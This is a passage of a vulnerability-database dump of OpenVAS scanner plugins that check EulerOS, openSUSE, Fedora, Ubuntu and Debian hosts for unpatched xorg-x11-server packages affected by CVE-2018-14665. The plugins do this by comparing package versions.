USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2553\");\n script_version(\"2020-01-23T13:05:32+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:05:32 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:05:32 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2553)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2553\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2553\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'xorg-x11-server' package(s) announced via the EulerOS-SA-2019-2553 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.(CVE-2018-14665)\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.19.5~5.h7.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.19.5~5.h7.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.19.5~5.h7.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.19.5~5.h7.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T17:34:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-11-17T00:00:00", "id": "OPENVAS:1361412562310852126", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852126", "type": "openvas", "title": "openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2018:3800-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852126\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-17 06:15:25 +0100 (Sat, 17 Nov 2018)\");\n script_name(\"openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2018:3800-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3800-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-11/msg00022.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the openSUSE-SU-2018:3800-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for xorg-x11-server fixes the following issues:\n\n - CVE-2018-14665: Disable -logfile and -modulepath when running with\n elevated privileges (bsc#1112020,\n\n Note that SUSE by default does not run with elevated privileges, so the\n default installation is not affected by this problem.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1420=1\");\n\n script_tag(name:\"affected\", value:\"xorg-x11-server on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-debuginfo\", rpm:\"xorg-x11-server-debuginfo~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-debugsource\", rpm:\"xorg-x11-server-debugsource~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-extra\", rpm:\"xorg-x11-server-extra~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-extra-debuginfo\", rpm:\"xorg-x11-server-extra-debuginfo~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-sdk\", rpm:\"xorg-x11-server-sdk~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-wayland\", rpm:\"xorg-x11-server-wayland~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-wayland-debuginfo\", rpm:\"xorg-x11-server-wayland-debuginfo~1.19.6~lp150.7.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192123", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2123)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2123\");\n script_version(\"2020-01-23T12:35:14+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:35:14 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:35:14 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2123)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP8\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2123\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2123\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'xorg-x11-server' package(s) announced via the EulerOS-SA-2019-2123 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.(CVE-2018-14665)\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Huawei EulerOS V2.0SP8.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP8\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xwayland\", rpm:\"xorg-x11-server-Xwayland~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.20.1~4.h2.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310876007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876007", "type": "openvas", "title": "Fedora Update for xorg-x11-server FEDORA-2018-4ab08fedd6", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876007\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:31:33 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for xorg-x11-server FEDORA-2018-4ab08fedd6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2018-4ab08fedd6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LJPSML4VDX7NY7N7NYQTBAOKMOMGUALW\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the FEDORA-2018-4ab08fedd6 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"X.Org X11 X server\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~1.20.3~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-11-08T00:00:00", "id": "OPENVAS:1361412562310875244", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875244", "type": "openvas", "title": "Fedora Update for xorg-x11-server FEDORA-2018-839720583a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_839720583a_xorg-x11-server_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xorg-x11-server FEDORA-2018-839720583a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875244\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-08 06:37:09 +0100 (Thu, 08 Nov 2018)\");\n script_name(\"Fedora Update for xorg-x11-server FEDORA-2018-839720583a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-839720583a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZSWEOYODBNWRD3QJXBCSBR7SFXPFM3D\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the FEDORA-2018-839720583a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"xorg-x11-server on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~1.19.6~10.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-27T00:00:00", "id": "OPENVAS:1361412562310843800", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843800", "type": "openvas", "title": "Ubuntu Update for xorg-server USN-3802-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3802_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for xorg-server USN-3802-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843800\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-27 06:24:24 +0200 (Sat, 27 Oct 2018)\");\n script_name(\"Ubuntu Update for xorg-server USN-3802-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|18\\.10|16\\.04 LTS)\");\n\n\n script_xref(name:\"USN\", value:\"3802-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3802-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-server'\n package(s) announced via the USN-3802-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Narendra Shinde discovered that the X.Org X server incorrectly handled\ncertain command line parameters when running as root with the legacy\nwrapper. When certain graphics drivers are being used, a local attacker\ncould possibly use this issue to overwrite arbitrary files and escalate\nprivileges.\");\n\n script_tag(name:\"affected\", value:\"xorg-server on Ubuntu 18.10,\n Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xserver-xorg-core\", ver:\"2:1.19.6-1ubuntu4.2\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xserver-xorg-core\", ver:\"2:1.20.1-3ubuntu2.1\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xserver-xorg-core-hwe-16.04\", ver:\"2:1.19.6-1ubuntu4.1~16.04.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-04T18:56:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "Narendra Shinde discovered that incorrect command-line parameter\nvalidation in the Xorg X server may result in arbitrary file overwrite,\nwhich can result in privilege escalation.", "modified": "2019-07-04T00:00:00", "published": "2018-10-25T00:00:00", "id": "OPENVAS:1361412562310704328", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704328", "type": "openvas", "title": "Debian Security Advisory DSA 4328-1 (xorg-server - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4328-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704328\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_name(\"Debian Security Advisory DSA 4328-1 (xorg-server - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-25 00:00:00 +0200 (Thu, 25 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4328.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"xorg-server on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 2:1.19.2-1+deb9u4.\n\nWe recommend that you upgrade your xorg-server packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/xorg-server\");\n script_tag(name:\"summary\", value:\"Narendra Shinde discovered that incorrect command-line parameter\nvalidation in the Xorg X server may result in arbitrary file overwrite,\nwhich can result in privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"xdmx\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xdmx-tools\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xnest\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xorg-server-source\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 